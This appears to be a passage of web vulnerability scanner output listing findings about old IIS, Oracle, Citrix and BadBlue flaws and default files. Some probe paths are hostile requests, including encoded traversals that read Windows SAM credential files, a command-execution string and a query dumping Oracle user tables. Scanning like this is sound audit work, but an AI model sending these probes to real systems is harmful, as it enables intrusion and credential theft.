+ OSVDB-474: /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-17671: /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability.
+ OSVDB-4908: /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.
+ OSVDB-5092: /config.inc: DotBr 0.1 configuration file includes usernames and passwords.
+ OSVDB-5095: /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings.
+ OSVDB-5096: /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings.
+ OSVDB-539: /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.
+ OSVDB-5407: /soap/servlet/soaprouter: Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.
+ OSVDB-5523: /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.
+ OSVDB-562: /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-5709: /.nsconfig: Contains authorization information
+ OSVDB-583: /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1: Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0011.
+ OSVDB-596: /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-6666: /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
+ OSVDB-6670: /applist.asp: Citrix server may allow remote users to view applications installed without authenticating.
+ OSVDB-6671: /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.
+ OSVDB-6672: /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
+ OSVDB-6672: /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
+ OSVDB-6672: /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
+ OSVDB-670: /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868.
+ OSVDB-670: /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868.
+ OSVDB-7: /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-7: /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-707: /globals.jsa: Oracle globals.jsa file
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-789: /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-9624: /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3092: /README: README file found.
+ OSVDB-3233: /j2ee/: j2ee directory found--possibly an Oracle app server directory.
+ OSVDB-3233: /WebCacheDemo.html: Oracle WebCache Demo
+ OSVDB-32333: /webcache/: Oracle WebCache Demo
+ OSVDB-3233: /webcache/webcache.xml: Oracle WebCache Demo
+ OSVDB-3233: /bmp/: SQLJ Demo Application
+ OSVDB-3233: /bmp/global-web-application.xml: SQLJ Demo Application
+ OSVDB-3233: /bmp/JSPClient.java: SQLJ Demo Application
+ OSVDB-3233: /bmp/mime.types: SQLJ Demo Application
+ OSVDB-3233: /bmp/README.txt: SQLJ Demo Application
+ OSVDB-3233: /bmp/sqljdemo.jsp: SQLJ Demo Application
+ OSVDB-3233: /bmp/setconn.jsp: SQLJ Demo Application
+ OSVDB-3233: /ptg_upgrade_pkg.log: Oracle log files.
+ OSVDB-3233: /OA_HTML/oam/weboam.log: Oracle log files.
+ OSVDB-3233: /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files
+ OSVDB-3233: /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files
+ OSVDB-3233: /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file
+ OSVDB-3233: /_pages/_demo/: Oracle JSP file
+ OSVDB-3233: /_pages/_webapp/_jsp/: Oracle JSP file.
+ OSVDB-3233: /_pages/_demo/_sql/: Oracle JSP file.
+ OSVDB-3233: /OA_HTML/_pages/: Oracle JSP file.
+ OSVDB-3233: /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ OSVDB-3233: /apex/: Oracle Application Express login screen.
+ OSVDB-3233: /OA_JAVA/: Oracle Applications Portal Page
+ OSVDB-3233: /OA_HTML/: Oracle Applications Portal Page
+ OSVDB-3233: /aplogon.html: Oracle Applications Portal Page
+ OSVDB-3233: /appdet.html: Oracle Applications Portal Pages
+ OSVDB-3233: /servlets/weboam/oam/oamLogin: Oracle Application Manager
+ OSVDB-3233: /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration inerface
+ OSVDB-3233: /reports/rwservlet: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showenv: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showmap: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showjobs: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/getjobid7?server=myrep: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/getjobid4?server=myrep: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showmap?server=myserver: Oracle Reports
+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unkown impact.
+ OSVDB-3093: /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/SELECT: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/null: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /OA_MEDIA/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/META-INF/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/Oracle/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/servlet.zip: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found.
+ OSVDB-3233: /OA_HTML/jsp/: Oracle Applications portal page found
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found.
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found.
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found.
+ OSVDB-3092: /install/install.php: Install file found.
+ OSVDB-3092: /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information.
+ OSVDB-3092: /cehttp/property/: Sterling Commerce Connect Direct configuration files.
+ OSVDB-3233: /doc/icodUserGuide.pdf: Instant Capacity on Demand (iCOD) Userís Guide.
+ OSVDB-3233: /doc/planning_SuperDome_configs.pdf: Planning HP SuperDome Configurations
+ OSVDB-3233: /doc/vxvm/pitc_ag.pdf: VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.
+ OSVDB-3233: /doc/Judy/Judy_tech_book.pdf: HP Judy documentation found.
+ OSVDB-3233: /doc/vxvm/vxvm_ag.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_hwnotes.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_ig.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_mig.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_tshoot.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_notes.pdf: Veritas Volume Manager documentation.
+ OSVDB-3233: /doc/vxvm/vxvm_ug.pdf: Veritas Volume Manager documentation.
+ OSVDB-3092: /staging/: This may be interesting...
+ OSVDB-3092: /_archive/: Archive found.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /upgrade.php: upgrade.php was found.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3092: /CHANGELOG.txt: A changelog was found.
+ OSVDB-3092: /sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.
+ OSVDB-3092: /content/sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.
+ /webservices/IlaWebServices: Host has the Oracle iLearning environment installed.
+ /phone/: This may be interesting...
+ OSVDB-3092: /Admin/: This might be interesting...
+ OSVDB-3092: /af/: This might be interesting... potential country code (Afghanistan)
+ OSVDB-3092: /ax/: This might be interesting... potential country code (Aland Islands)
+ OSVDB-3092: /al/: This might be interesting... potential country code (Albania)
+ OSVDB-3092: /dz/: This might be interesting... potential country code (Algeria)
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
+ OSVDB-3092: /ao/: This might be interesting... potential country code (Angola)
+ OSVDB-3092: /ai/: This might be interesting... potential country code (Anguilla)
+ OSVDB-3092: /aq/: This might be interesting... potential country code (Antarctica)
+ OSVDB-3092: /ag/: This might be interesting... potential country code (Antigua And Barbuda)
+ OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
+ OSVDB-3092: /am/: This might be interesting... potential country code (Armenia)
+ OSVDB-3092: /aw/: This might be interesting... potential country code (Aruba)
+ OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
+ OSVDB-3092: /at/: This might be interesting... potential country code (Austria)
+ OSVDB-3092: /az/: This might be interesting... potential country code (Azerbaijan)
+ OSVDB-3092: /bs/: This might be interesting... potential country code (Bahamas)
+ OSVDB-3092: /bh/: This might be interesting... potential country code (Bahrain)
+ OSVDB-3092: /bd/: This might be interesting... potential country code (Bangladesh)
+ OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /be/: This might be interesting... potential country code (Belgium)
+ OSVDB-3092: /bz/: This might be interesting... potential country code (Belize)
+ OSVDB-3092: /bj/: This might be interesting... potential country code (Benin)
+ OSVDB-3092: /bm/: This might be interesting... potential country code (Bermuda)
+ OSVDB-3092: /bt/: This might be interesting... potential country code (Bhutan)
+ OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
+ OSVDB-3092: /ba/: This might be interesting... potential country code (Bosnia And Herzegovina)
+ OSVDB-3092: /bw/: This might be interesting... potential country code (Botswana)
+ OSVDB-3092: /bv/: This might be interesting... potential country code (Bouvet Island)
+ OSVDB-3092: /br/: This might be interesting... potential country code (Brazil)
+ OSVDB-3092: /io/: This might be interesting... potential country code (British Indian Ocean Territory)
+ OSVDB-3092: /bn/: This might be interesting... potential country code (Brunei Darussalam)
+ OSVDB-3092: /bg/: This might be interesting... potential country code (Bulgaria)
+ OSVDB-3092: /bf/: This might be interesting... potential country code (Burkina Faso)
+ OSVDB-3092: /bi/: This might be interesting... potential country code (Burundi)
+ OSVDB-3092: /kh/: This might be interesting... potential country code (Cambodia)
+ OSVDB-3092: /cm/: This might be interesting... potential country code (Cameroon)
+ OSVDB-3092: /ca/: This might be interesting... potential country code (Canada)
+ OSVDB-3092: /cv/: This might be interesting... potential country code (Cape Verde)
+ OSVDB-3092: /ky/: This might be interesting... potential country code (Cayman Islands)
+ OSVDB-3092: /cf/: This might be interesting... potential country code (Central African Republic)
+ OSVDB-3092: /td/: This might be interesting... potential country code (Chad)
+ OSVDB-3092: /cl/: This might be interesting... potential country code (Chile)
+ OSVDB-3092: /cn/: This might be interesting... potential country code (China)
+ OSVDB-3092: /cx/: This might be interesting... potential country code (Christmas Island)
+ OSVDB-3092: /cc/: This might be interesting... potential country code (Cocos (keeling) Islands)
+ OSVDB-3092: /co/: This might be interesting... potential country code (Colombia)
+ OSVDB-3092: /km/: This might be interesting... potential country code (Comoros)
+ OSVDB-3092: /cg/: This might be interesting... potential country code (Congo)
+ OSVDB-3092: /cd/: This might be interesting... potential country code (The Democratic Republic Of The Congo)
+ OSVDB-3092: /ck/: This might be interesting... potential country code (Cook Islands)
+ OSVDB-3092: /cr/: This might be interesting... potential country code (Costa Rica)
+ OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
+ OSVDB-3092: /hr/: This might be interesting... potential country code (Croatia)
+ OSVDB-3092: /cu/: This might be interesting... potential country code (Cuba)
+ OSVDB-3092: /cy/: This might be interesting... potential country code (Cyprus)
+ OSVDB-3092: /cz/: This might be interesting... potential country code (Czech Republic)
+ OSVDB-3092: /dk/: This might be interesting... potential country code (Denmark)
+ OSVDB-3092: /dj/: This might be interesting... potential country code (Djibouti)
+ OSVDB-3092: /dm/: This might be interesting... potential country code (Dominica)
+ OSVDB-3092: /do/: This might be interesting... potential country code (Dominican Republic)
+ OSVDB-3092: /ec/: This might be interesting... potential country code (Ecuador)
+ OSVDB-3092: /eg/: This might be interesting... potential country code (Egypt)
+ OSVDB-3092: /sv/: This might be interesting... potential country code (El Salvador)
+ OSVDB-3092: /gq/: This might be interesting... potential country code (Equatorial Guinea)
+ OSVDB-3092: /er/: This might be interesting... potential country code (Eritrea)
+ OSVDB-3092: /ee/: This might be interesting... potential country code (Estonia)
+ OSVDB-3092: /et/: This might be interesting... potential country code (Ethiopia)
+ OSVDB-3092: /fk/: This might be interesting... potential country code (Falkland Islands (malvinas))
+ OSVDB-3092: /fo/: This might be interesting... potential country code (Faroe Islands)
+ OSVDB-3092: /fj/: This might be interesting... potential country code (Fiji)
+ OSVDB-3092: /fi/: This might be interesting... potential country code (Finland)
+ OSVDB-3092: /fr/: This might be interesting... potential country code (France)
+ OSVDB-3092: /gf/: This might be interesting... potential country code (French Guiana)
+ OSVDB-3092: /pf/: This might be interesting... potential country code (French Polynesia)
+ OSVDB-3092: /tf/: This might be interesting... potential country code (French Southern Territories)
+ OSVDB-3092: /ga/: This might be interesting... potential country code (Gabon)
+ OSVDB-3092: /gm/: This might be interesting... potential country code (Gambia)
+ OSVDB-3092: /ge/: This might be interesting... potential country code (Georgia)
+ OSVDB-3092: /de/: This might be interesting... potential country code (Germany)
+ OSVDB-3092: /gh/: This might be interesting... potential country code (Ghana)
+ OSVDB-3092: /gi/: This might be interesting... potential country code (Gibraltar)
+ OSVDB-3092: /gr/: This might be interesting... potential country code (Greece)
+ OSVDB-3092: /gl/: This might be interesting... potential country code (Greenland)
+ OSVDB-3092: /gd/: This might be interesting... potential country code (Grenada)
+ OSVDB-3092: /gp/: This might be interesting... potential country code (Guadeloupe)
+ OSVDB-3092: /gu/: This might be interesting... potential country code (Guam)
+ OSVDB-3092: /gt/: This might be interesting... potential country code (Guatemala)
+ OSVDB-3092: /gg/: This might be interesting... potential country code (Guernsey)
+ OSVDB-3092: /gn/: This might be interesting... potential country code (Guinea)
+ OSVDB-3092: /gw/: This might be interesting... potential country code (Guinea-bissau)
+ OSVDB-3092: /gy/: This might be interesting... potential country code (Guyana)
+ OSVDB-3092: /ht/: This might be interesting... potential country code (Haiti)
+ OSVDB-3092: /hm/: This might be interesting... potential country code (Heard Island And Mcdonald Islands)
+ OSVDB-3092: /va/: This might be interesting... potential country code (Holy See (vatican City State))
+ OSVDB-3092: /hn/: This might be interesting... potential country code (Honduras)
+ OSVDB-3092: /hk/: This might be interesting... potential country code (Hong Kong)
+ OSVDB-3092: /hu/: This might be interesting... potential country code (Hungary)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /in/: This might be interesting... potential country code (India)
+ OSVDB-3092: /id/: This might be interesting... potential country code (Indonesia)
+ OSVDB-3092: /ir/: This might be interesting... potential country code (Islamic Republic Of Iran)
+ OSVDB-3092: /iq/: This might be interesting... potential country code (Iraq)
+ OSVDB-3092: /ie/: This might be interesting... potential country code (Ireland)
+ OSVDB-3092: /im/: This might be interesting... potential country code (Isle Of Man)
+ OSVDB-3092: /il/: This might be interesting... potential country code (Israel)
+ OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
+ OSVDB-3092: /jm/: This might be interesting... potential country code (Jamaica)
+ OSVDB-3092: /jp/: This might be interesting... potential country code (Japan)
+ OSVDB-3092: /je/: This might be interesting... potential country code (Jersey)
+ OSVDB-3092: /jo/: This might be interesting... potential country code (Jordan)
+ OSVDB-3092: /kz/: This might be interesting... potential country code (Kazakhstan)
+ OSVDB-3092: /ke/: This might be interesting... potential country code (Kenya)
+ OSVDB-3092: /ki/: This might be interesting... potential country code (Kiribati)
+ OSVDB-3092: /kp/: This might be interesting... potential country code (Democratic People's Republic Of Korea)
+ OSVDB-3092: /kr/: This might be interesting... potential country code (Republic Of Korea)
+ OSVDB-3092: /kw/: This might be interesting... potential country code (Kuwait)
+ OSVDB-3092: /kg/: This might be interesting... potential country code (Kyrgyzstan)
+ OSVDB-3092: /la/: This might be interesting... potential country code (Lao People's Democratic Republic)
+ OSVDB-3092: /lv/: This might be interesting... potential country code (Latvia)
+ OSVDB-3092: /lb/: This might be interesting... potential country code (Lebanon)
+ OSVDB-3092: /ls/: This might be interesting... potential country code (Lesotho)
+ OSVDB-3092: /lr/: This might be interesting... potential country code (Liberia)
+ OSVDB-3092: /ly/: This might be interesting... potential country code (Libyan Arab Jamahiriya)
+ OSVDB-3092: /li/: This might be interesting... potential country code (Liechtenstein)
+ OSVDB-3092: /lt/: This might be interesting... potential country code (Lithuania)
+ OSVDB-3092: /lu/: This might be interesting... potential country code (Luxembourg)
+ OSVDB-3092: /mo/: This might be interesting... potential country code (Macao)
+ OSVDB-3092: /mk/: This might be interesting... potential country code (Macedonia)
+ OSVDB-3092: /mg/: This might be interesting... potential country code (Madagascar)
+ OSVDB-3092: /mw/: This might be interesting... potential country code (Malawi)
+ OSVDB-3092: /my/: This might be interesting... potential country code (Malaysia)
+ OSVDB-3092: /mv/: This might be interesting... potential country code (Maldives)
+ OSVDB-3092: /ml/: This might be interesting... potential country code (Mali)
+ OSVDB-3092: /mt/: This might be interesting... potential country code (Malta)
+ OSVDB-3092: /mh/: This might be interesting... potential country code (Marshall Islands)
+ OSVDB-3092: /mq/: This might be interesting... potential country code (Martinique)
+ OSVDB-3092: /mr/: This might be interesting... potential country code (Mauritania)
+ OSVDB-3092: /mu/: This might be interesting... potential country code (Mauritius)
+ OSVDB-3092: /yt/: This might be interesting... potential country code (Mayotte)
+ OSVDB-3092: /mx/: This might be interesting... potential country code (Mexico)
+ OSVDB-3092: /fm/: This might be interesting... potential country code (Federated States Of Micronesia)
+ OSVDB-3092: /md/: This might be interesting... potential country code (Republic Of Moldova)
+ OSVDB-3092: /mc/: This might be interesting... potential country code (Monaco)
+ OSVDB-3092: /mn/: This might be interesting... potential country code (Mongolia)
+ OSVDB-3092: /me/: This might be interesting... potential country code (Montenegro)
+ OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
+ OSVDB-3092: /ma/: This might be interesting... potential country code (Morocco)
+ OSVDB-3092: /mz/: This might be interesting... potential country code (Mozambique)
+ OSVDB-3092: /mm/: This might be interesting... potential country code (Myanmar)
+ OSVDB-3092: /na/: This might be interesting... potential country code (Namibia)
+ OSVDB-3092: /nr/: This might be interesting... potential country code (Nauru)
+ OSVDB-3092: /np/: This might be interesting... potential country code (Nepal)
+ OSVDB-3092: /nl/: This might be interesting... potential country code (Netherlands)
+ OSVDB-3092: /an/: This might be interesting... potential country code (Netherlands Antilles)
+ OSVDB-3092: /nc/: This might be interesting... potential country code (New Caledonia)
+ OSVDB-3092: /nz/: This might be interesting... potential country code (New Zealand)
+ OSVDB-3092: /ni/: This might be interesting... potential country code (Nicaragua)
+ OSVDB-3092: /ne/: This might be interesting... potential country code (Niger)
+ OSVDB-3092: /ng/: This might be interesting... potential country code (Nigeria)
+ OSVDB-3092: /nu/: This might be interesting... potential country code (Niue)
+ OSVDB-3092: /nf/: This might be interesting... potential country code (Norfolk Island)
+ OSVDB-3092: /mp/: This might be interesting... potential country code (Northern Mariana Islands)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /om/: This might be interesting... potential country code (Oman)
+ OSVDB-3092: /pk/: This might be interesting... potential country code (Pakistan)
+ OSVDB-3092: /pw/: This might be interesting... potential country code (Palau)
+ OSVDB-3092: /ps/: This might be interesting... potential country code (Palestinian Territory)
+ OSVDB-3092: /pa/: This might be interesting... potential country code (Panama)
+ OSVDB-3092: /pg/: This might be interesting... potential country code (Papua New Guinea)
+ OSVDB-3092: /py/: This might be interesting... potential country code (Paraguay)
+ OSVDB-3092: /pe/: This might be interesting... potential country code (Peru)
+ OSVDB-3092: /ph/: This might be interesting... potential country code (Philippines)
+ OSVDB-3092: /pn/: This might be interesting... potential country code (Pitcairn)
+ OSVDB-3092: /pl/: This might be interesting... potential country code (Poland)
+ OSVDB-3092: /pt/: This might be interesting... potential country code (Portugal)
+ OSVDB-3092: /pr/: This might be interesting... potential country code (Puerto Rico)
+ OSVDB-3092: /qa/: This might be interesting... potential country code (Qatar)
+ OSVDB-3092: /re/: This might be interesting... potential country code (RÉunion)
+ OSVDB-3092: /ro/: This might be interesting... potential country code (Romania)
+ OSVDB-3092: /ru/: This might be interesting... potential country code (Russian Federation)
+ OSVDB-3092: /rw/: This might be interesting... potential country code (Rwanda)
+ OSVDB-3092: /bl/: This might be interesting... potential country code (Saint BarthÉlemy)
+ OSVDB-3092: /sh/: This might be interesting... potential country code (Saint Helena)
+ OSVDB-3092: /kn/: This might be interesting... potential country code (Saint Kitts And Nevis)
+ OSVDB-3092: /lc/: This might be interesting... potential country code (Saint Lucia)
+ OSVDB-3092: /mf/: This might be interesting... potential country code (Saint Martin)
+ OSVDB-3092: /pm/: This might be interesting... potential country code (Saint Pierre And Miquelon)
+ OSVDB-3092: /vc/: This might be interesting... potential country code (Saint Vincent And The Grenadines)
+ OSVDB-3092: /ws/: This might be interesting... potential country code (Samoa)
+ OSVDB-3092: /sm/: This might be interesting... potential country code (San Marino)
+ OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
+ OSVDB-3092: /sa/: This might be interesting... potential country code (Saudi Arabia)
+ OSVDB-3092: /sn/: This might be interesting... potential country code (Senegal)
+ OSVDB-3092: /rs/: This might be interesting... potential country code (Serbia)
+ OSVDB-3092: /sc/: This might be interesting... potential country code (Seychelles)
+ OSVDB-3092: /sl/: This might be interesting... potential country code (Sierra Leone)
+ OSVDB-3092: /sg/: This might be interesting... potential country code (Singapore)
+ OSVDB-3092: /sk/: This might be interesting... potential country code (Slovakia)
+ OSVDB-3092: /si/: This might be interesting... potential country code (Slovenia)
+ OSVDB-3092: /sb/: This might be interesting... potential country code (Solomon Islands)
+ OSVDB-3092: /so/: This might be interesting... potential country code (Somalia)
+ OSVDB-3092: /za/: This might be interesting... potential country code (South Africa)
+ OSVDB-3092: /gs/: This might be interesting... potential country code (South Georgia And The South Sandwich Islands)
+ OSVDB-3092: /es/: This might be interesting... potential country code (Spain)
+ OSVDB-3092: /lk/: This might be interesting... potential country code (Sri Lanka)
+ OSVDB-3092: /sd/: This might be interesting... potential country code (Sudan)
+ OSVDB-3092: /sr/: This might be interesting... potential country code (Suriname)
+ OSVDB-3092: /sj/: This might be interesting... potential country code (Svalbard And Jan Mayen)
+ OSVDB-3092: /sz/: This might be interesting... potential country code (Swaziland)
+ OSVDB-3092: /se/: This might be interesting... potential country code (Sweden)
